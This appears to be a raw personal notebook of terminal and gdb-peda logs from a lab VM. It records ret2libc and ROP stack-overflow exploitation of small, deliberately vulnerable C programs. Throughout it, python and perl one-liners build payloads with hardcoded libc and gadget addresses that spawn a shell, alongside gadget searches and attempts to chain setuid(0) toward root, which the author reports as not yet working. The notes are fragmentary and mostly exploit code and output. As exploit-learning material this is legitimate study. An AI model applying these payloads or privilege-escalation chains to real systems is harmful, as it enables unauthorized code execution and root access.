arg[2]: 0x7fffffffdf90 --> 0x0
=> 0x7ffff7ac8e30 <execve>: mov eax,0x3b
0x7ffff7ac8e35 <execve+5>: syscall
https://jameshfisher.com/2017/02/05/how-do-i-use-execve-in-c/
lasalle@lasalle-VirtualBox:~/workspaces19/ret2libc$ cat exec2.c
#include <stdio.h>
#include <unistd.h>
int main(void) {
char* argv[] = { NULL };
char* envp[] = { NULL };
execve("/bin/sh", argv, envp);
return 0;
}
gdb-peda$ disas main
Dump of assembler code for function main:
0x00000000000006aa <+0>: push rbp
0x00000000000006ab <+1>: mov rbp,rsp
0x00000000000006ae <+4>: sub rsp,0x20
0x00000000000006b2 <+8>: mov rax,QWORD PTR fs:0x28
0x00000000000006bb <+17>: mov QWORD PTR [rbp-0x8],rax
0x00000000000006bf <+21>: xor eax,eax
0x00000000000006c1 <+23>: mov QWORD PTR [rbp-0x18],0x0
0x00000000000006c9 <+31>: mov QWORD PTR [rbp-0x10],0x0
0x00000000000006d1 <+39>: lea rdx,[rbp-0x10]
0x00000000000006d5 <+43>: lea rax,[rbp-0x18]
0x00000000000006d9 <+47>: mov rsi,rax
0x00000000000006dc <+50>: lea rdi,[rip+0xb1] # 0x794
0x00000000000006e3 <+57>: call 0x580 <execve@plt>
0x00000000000006e8 <+62>: mov eax,0x0
0x00000000000006ed <+67>: mov rcx,QWORD PTR [rbp-0x8]
0x00000000000006f1 <+71>: xor rcx,QWORD PTR fs:0x28
0x00000000000006fa <+80>: je 0x701 <main+87>
0x00000000000006fc <+82>: call 0x570 <__stack_chk_fail@plt>
0x0000000000000701 <+87>: leave
0x0000000000000702 <+88>: ret
End of assembler dump.
hello.asm
section .rodata
format: db 'Hello %s', 10, 0
name: db 'Conrad', 0
section .text
global main
extern printf
main:
; printf(format, name)
mov rdi, format
mov rsi, name
; no XMM registers
mov rax, 0
call printf
; return 0
mov rax, 0
ret
https://stackoverflow.com/questions/38335212/calling-printf-in-x86-64-using-gnu-assembler/38335743
call printf@plt or -no-pie in gcc
position independent issue
$ ./hello
./hello: Symbol `printf' causes overflow in R_X86_64_PC32 relocation
Segmentation fault (core dumped)
nasm hello.s -f elf64 -o hello.o && gcc -m64 -no-pie -o hello hello.o
nasm execve.s -f elf64 -o execve.o && gcc -m64 -no-pie -o execve execve.o
$ ./execve
$ whoami
lasalle
$
$ cat execve.s
section .rodata
sh: db '/bin/sh'
section .text
global main
extern execve
main:
; execve('/bin/sh', NULL, NULL)
mov rdi, sh
mov rsi, 0
mov rax, 0
call execve
; return 0
mov rax, 0
ret
gdb-peda$ p execve
$1 = {<text variable, no debug info>} 0x7ffff7ac8e30 <execve>
gdb-peda$
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x30\x8e\xac\xf7\xff\x7f"'`
ret is pop rip
pop the value of stack to rip which is execve
before that populate rdi, rsi and rax
push address to stack,
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
gdb-peda$
ropper --file ret2libc --search "% pop"
0x0000000000400661: pop rsi; pop r15; ret;
ropper --file ret2libc --search "% rdi"
0x0000000000400663: pop rdi; ret;
gdb-peda$ p execve
$1 = {<text variable, no debug info>} 0x7ffff7ac8e30 <execve>
gdb-peda$
0x0000000000 40 06 33: pop rdi; ret; and pop execve
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x33\x06\x40","\x00\x00\x00\x00\x00\x00","\x30\x8e\xac\xf7\xff\x7f"'`
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x61\x06\x40\x00\x00\x00","\x30\x8e\xac\xf7\xff\x7f"'`
dumprop
Writing ROP gadgets to file: bug-rop.txt ...
0x40051a: ret
0x400480: repz ret
0x400578: leave; ret
0x4004b8: pop rbp; ret
0x400633: pop rdi; ret ---> we need this one
r `perl -e 'print "A"x128,"B"x32,"\x30\x8e\xac\xf7\xff\x7f","\x33\x06\x40"'`
0000| 0x7fffffffdef8 --> 0x7ffff7ac8e30 (<execve>: mov eax,0x3b)
gdb-peda$ ropsearch
Error: missing argument
Search for ROP gadgets in memory
Note: only for simple gadgets, for full ROP search try: http://ropshell.com
Usage:
ropsearch "gadget" start end
ropsearch "gadget" pagename
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400633 : (b'5fc3') pop rdi; ret
gdb-peda$
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x33\x06\x40","C"x5,"\x30\x8e\xac\xf7\xff\x7f"'`
null byte is not possible on strcpy because it is from command line argument and it strips off \x00
now moving to ret2lib.c again to use read logic instead of strcpy.
bug2.c
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
char buf[80];
int r;
r = read(0, buf, 400);
printf("\nRead %d bytes. buf is %s\n", r, buf);
puts("No shell for you :(");
return 0;
}
gcc -no-pie -fno-stack-protector bug2.c -o bug2
$ ./bug2
aaaaaaaaaaaa
Read 13 bytes. buf is aaaaaaaaaaaa
No shell for you :(
https://www.tiandiwuji.top/posts/32791/
gdb-peda$ i func
All defined functions:
Non-debugging symbols:
0x0000000000400470 _init
0x00000000004004a0 puts@plt
0x00000000004004b0 system@plt
0x00000000004004c0 read@plt
0x00000000004004d0 exit@plt
0x00000000004004e0 _start
0x0000000000400510 _dl_relocate_static_pie
0x0000000000400520 deregister_tm_clones
0x0000000000400550 register_tm_clones
0x0000000000400590 __do_global_dtors_aux
0x00000000004005c0 frame_dummy
0x00000000004005c7 shell
0x00000000004005e6 main
0x0000000000400640 __libc_csu_init
0x00000000004006b0 __libc_csu_fini
0x00000000004006b4 _fini
python -c "print 'A' * 280 + '\xc7\x05\x40\x00\x00\x00\x00\x00'" > temp
python -c "print 'A' * 280 + '\x38\x06\x40\x00\x00\x00\x00\x00' + '\xc7\x05\x40\x00\x00\x00\x00\x00'" > temp
$ (cat temp;cat) | ./vuln
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8�@
whoami
lasalle
lasalle@lasalle-VirtualBox:~/workspaces19/vuln2$ (cat temp;cat) | ./vuln
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8�@
w
15:19:54 up 13:31, 1 user, load average: 0.04, 0.06, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
lasalle :0 :0 Sun17 ?xdm? 6:59 0.02s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHEL
whoami
lasalle
exit
#include<stdio.h>
#include <string.h>
/* Eventhough shell() function isnt invoked directly, its needed
here since 'system@PLT' and 'exit@PLT' stub code should be pres
ent in executable to successfully exploit it. */
void shell() {
system("/bin/sh");
exit(0);
}
int main(int argc, char* argv[]) {
int i=0;
char buf[256];
read(0, buf, 500);
printf("%s\n",buf);
return 0;
}
Dump of assembler code for function main:
0x00000000004005e6 <+0>: push rbp
0x00000000004005e7 <+1>: mov rbp,rsp
=> 0x00000000004005ea <+4>: sub rsp,0x120
0x00000000004005f1 <+11>: mov DWORD PTR [rbp-0x114],edi
0x00000000004005f7 <+17>: mov QWORD PTR [rbp-0x120],rsi
0x00000000004005fe <+24>: mov DWORD PTR [rbp-0x4],0x0
0x0000000000400605 <+31>: lea rax,[rbp-0x110]
0x000000000040060c <+38>: mov edx,0x1f4
0x0000000000400611 <+43>: mov rsi,rax
0x0000000000400614 <+46>: mov edi,0x0
0x0000000000400619 <+51>: mov eax,0x0
0x000000000040061e <+56>: call 0x4004c0 <read@plt>
0x0000000000400623 <+61>: lea rax,[rbp-0x110]
0x000000000040062a <+68>: mov rdi,rax
0x000000000040062d <+71>: call 0x4004a0 <puts@plt>
0x0000000000400632 <+76>: mov eax,0x0
0x0000000000400637 <+81>: leave
0x0000000000400638 <+82>: ret
End of assembler dump.
https://www.tiandiwuji.top/posts/32791/
pattern_create 300
#include<stdio.h>
#include <string.h>
int main(int argc, char* argv[]) {
system("/bin/sh");
exit(0);
return 0;
}
Dump of assembler code for function main:
0x0000000000400537 <+0>: push rbp
0x0000000000400538 <+1>: mov rbp,rsp
0x000000000040053b <+4>: sub rsp,0x10
0x000000000040053f <+8>: mov DWORD PTR [rbp-0x4],edi
0x0000000000400542 <+11>: mov QWORD PTR [rbp-0x10],rsi
0x0000000000400546 <+15>: lea rdi,[rip+0xa7] # 0x4005f4
0x000000000040054d <+22>: mov eax,0x0
0x0000000000400552 <+27>: call 0x400430 <system@plt>
0x0000000000400557 <+32>: mov edi,0x0
0x000000000040055c <+37>: call 0x400440 <exit@plt>
gcc -no-pie -fno-stack-protector vuln2.c -o vuln2
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x400570 (<__libc_csu_init>: push r15)
RDX: 0x7fffffffe098 --> 0x7fffffffe3e6 ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffe088 --> 0x7fffffffe3bf ("/home/lasalle/workspaces19/vuln2/vuln2")
RDI: 0x4005f4 --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x7fffffffdfa0 --> 0x400570 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffdf90 --> 0x7fffffffe088 --> 0x7fffffffe3bf ("/home/lasalle/workspaces19/vuln2/vuln2")
RIP: 0x400552 (<main+27>: call 0x400430 <system@plt>)
R8 : 0x7ffff7dd0d80 --> 0x0
R9 : 0x7ffff7dd0d80 --> 0x0
R10: 0x0
R11: 0x0
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe080 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400542 <main+11>: mov QWORD PTR [rbp-0x10],rsi
0x400546 <main+15>: lea rdi,[rip+0xa7] # 0x4005f4
0x40054d <main+22>: mov eax,0x0
=> 0x400552 <main+27>: call 0x400430 <system@plt>
0x400557 <main+32>: mov edi,0x0
0x40055c <main+37>: call 0x400440 <exit@plt>
0x400561: nop WORD PTR cs:[rax+rax*1+0x0]
0x40056b: nop DWORD PTR [rax+rax*1+0x0]
Guessed arguments:
arg[0]: 0x4005f4 --> 0x68732f6e69622f ('/bin/sh')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdf90 --> 0x7fffffffe088 --> 0x7fffffffe3bf ("/home/lasalle/workspaces19/vuln2/vuln2")
0008| 0x7fffffffdf98 --> 0x100000000
0016| 0x7fffffffdfa0 --> 0x400570 (<__libc_csu_init>: push r15)
0024| 0x7fffffffdfa8 --> 0x7ffff7a05b97 (<__libc_start_main+231>: mov edi,eax)
0032| 0x7fffffffdfb0 --> 0x1
0040| 0x7fffffffdfb8 --> 0x7fffffffe088 --> 0x7fffffffe3bf ("/home/lasalle/workspaces19/vuln2/vuln2")
0048| 0x7fffffffdfc0 --> 0x100008000
0056| 0x7fffffffdfc8 --> 0x400537 (<main>: push rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
$ cat system.s
section .rodata
sh: db '/bin/sh'
section .text
global main
extern system
main:
; system('/bin/sh', NULL, NULL)
mov rdi, sh
mov rsi, 0
mov eax, 0
call system
; return 0
mov rax, 0
ret
nasm system.s -f elf64 -o system.o && gcc -m64 -no-pie -o system system.o
source
$ cat bug2.c
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
char buf[80];
int r;
r = read(0, buf, 400);
printf("\nRead %d bytes. buf is %s\n", r, buf);
puts("No shell for you :(");
return 0;
}
making it root
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
setuid(0);
seteuid(0);
char buf[80];
int r;
r = read(0, buf, 400);
printf("\nRead %d bytes. buf is %s\n", r, buf);
puts("No shell for you :(");
return 0;
}
gcc -no-pie -fno-stack-protector bug3.c -o bug3
0x0000000000400669 <+98>: mov eax,0x0
0x000000000040066e <+103>: leave
0x000000000040066f <+104>: ret
End of assembler dump.
gdb-peda$ b *main+104
Breakpoint 1 at 0x40066f
gdb-peda$
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x004006d3 : (b'5fc3') pop rdi; ret
python -c "print 'A' * 96 + 'B' * 8 + '\xd3\x06\x40\x00\x00\x00\x00\x00' + '\x9a\x7e\xb9\xf7\xff\x7f\x00\x00' " > temp
gdb-peda$ find '/bin/sh'
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b97e9a --> 0x68732f6e69622f ('/bin/sh')
gdb-peda$
gdb-peda$ ropsearch "pop rsi"
Searching for ROP gadget: 'pop rsi' in: binary ranges
0x004006d1 : (b'5e415fc3') pop rsi; pop r15; ret
gdb-peda$
python -c "print 'A' * 96 + 'B' * 8 + '\xd3\x06\x40\x00\x00\x00\x00\x00' + '\x9a\x7e\xb9\xf7\xff\x7f\x00\x00' + '\xd1\x06\x40\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' " > temp
gdb-peda$ p execve
$2 = {<text variable, no debug info>} 0x7ffff7ac8e30 <execve>
python -c "print 'A' * 96 + 'B' * 8 + '\xd3\x06\x40\x00\x00\x00\x00\x00' + '\x9a\x7e\xb9\xf7\xff\x7f\x00\x00' + '\xd1\x06\x40\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x30\x8e\xac\xf7\xff\x7f\x00\x00'" > temp
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7af4154 (<__GI___libc_write+20>: cmp rax,0xfffffffffffff000)
RDX: 0x7ffff7dd18c0 --> 0x0
RSI: 0x602260 ("No shell for you :(\nis ", 'A' <repeats 92 times>, "\231\n")
RDI: 0x1
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffdfb8 --> 0x4006d3 (<__libc_csu_init+99>: pop rdi)
RIP: 0x40066f (<main+104>: ret)
R8 : 0x7ffff7fde4c0 (0x00007ffff7fde4c0)
R9 : 0x5d (']')
R10: 0x3
R11: 0x246
R12: 0x400520 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe090 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400664 <main+93>: call 0x4004d0 <puts@plt>
0x400669 <main+98>: mov eax,0x0
0x40066e <main+103>: leave
=> 0x40066f <main+104>: ret
0x400670 <__libc_csu_init>: push r15
0x400672 <__libc_csu_init+2>: push r14
0x400674 <__libc_csu_init+4>: mov r15,rdx
0x400677 <__libc_csu_init+7>: push r13
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdfb8 --> 0x4006d3 (<__libc_csu_init+99>: pop rdi)
0008| 0x7fffffffdfc0 --> 0x7ffff7b97e9a --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffdfc8 --> 0x4006d1 (<__libc_csu_init+97>: pop rsi)
0024| 0x7fffffffdfd0 --> 0x0
0032| 0x7fffffffdfd8 --> 0x0
0040| 0x7fffffffdfe0 --> 0x7ffff7ac8e30 (<execve>: mov eax,0x3b)
0048| 0x7fffffffdfe8 --> 0x9bd2de92ced5820a
0056| 0x7fffffffdff0 --> 0x400520 (<_start>: xor ebp,ebp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x000000000040066f in main ()
gdb-peda$
0x00007ffff7ac8e35 78 in ../sysdeps/unix/syscall-template.S
gdb-peda$ si
process 13037 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
Error in re-setting breakpoint 1: No symbol "main" in current context.
Error in re-setting breakpoint 1: No symbol "main" in current context.
Error in re-setting breakpoint 1: No symbol "main" in current context.
[Inferior 1 (process 13037) exited normally]
Warning: not running
did not work for root. using bug2.c to and chain setuid
Breakpoint 1, 0x000000000040057b in main ()
gdb-peda$ p setuid
$1 = {int (uid_t)} 0x7ffff7ac9970 <__setuid>
gdb-peda$
bug3.c helps as edi is 0
0x0000000000400616 <+15>: mov edi,0x0
0x000000000040061b <+20>: call 0x400500 <setuid@plt>
0x0000000000400620 <+25>: mov edi,0x0
0x0000000000400625 <+30>: call 0x400510 <seteuid@plt>
python -c "print 'A' * 96 + 'B' * 8 + '\x33\x06\x40\x00\x00\x00\x00\x00' + '\x9a\x7e\xb9\xf7\xff\x7f\x00\x00' + '\x31\x06\x40\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x30\x8e\xac\xf7\xff\x7f\x00\x00'" > temp
$ (cat temp;cat) | ./bug2
Read 153 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
whoami
lasalle
gdb-peda$ p setuid
$1 = {int (uid_t)} 0x7ffff7ac9970 <__setuid>
gdb-peda$
gdb-peda$ p seteuid
$2 = {int (uid_t)} 0x7ffff7afac00 <__GI_seteuid>
gdb-peda$
python -c "print 'A' * 96 + 'B' * 8 + '\x33\x06\x40\x00\x00\x00\x00\x00' + '\x9a\x7e\xb9\xf7\xff\x7f\x00\x00' + '\x31\x06\x40\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x30\x8e\xac\xf7\xff\x7f\x00\x00'" > temp
setuid
'\x70\x99\xac\xf7\xff\x7f\x00\x00'
python -c "print 'A' * 96 + 'B' * 8 + '\x33\x06\x40\x00\x00\x00\x00\x00' + '\x9a\x7e\xb9\xf7\xff\x7f\x00\x00' + '\x31\x06\x40\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x70\x99\xac\xf7\xff\x7f\x00\x00' + '\x30\x8e\xac\xf7\xff\x7f\x00\x00'" > temp
needs rdi
'\x00\x00\x00\x00\x00\x00\x00\x00'
gdb-peda$ b *main+84
Breakpoint 1 at 0x4005cb
gdb-peda$ b *main+84
Breakpoint 1 at 0x4005cb
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400633 : (b'5fc3') pop rdi; ret
gdb-peda$
python -c "print 'A' * 96 + 'B' * 8 + '\x33\x06\x40\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x70\x99\xac\xf7\xff\x7f\x00\x00' + '\x33\x06\x40\x00\x00\x00\x00\x00' + '\x9a\x7e\xb9\xf7\xff\x7f\x00\x00' + '\x31\x06\x40\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x70\x99\xac\xf7\xff\x7f\x00\x00' + '\x30\x8e\xac\xf7\xff\x7f\x00\x00'" > temp
setuid requires other field to work. not working at this time.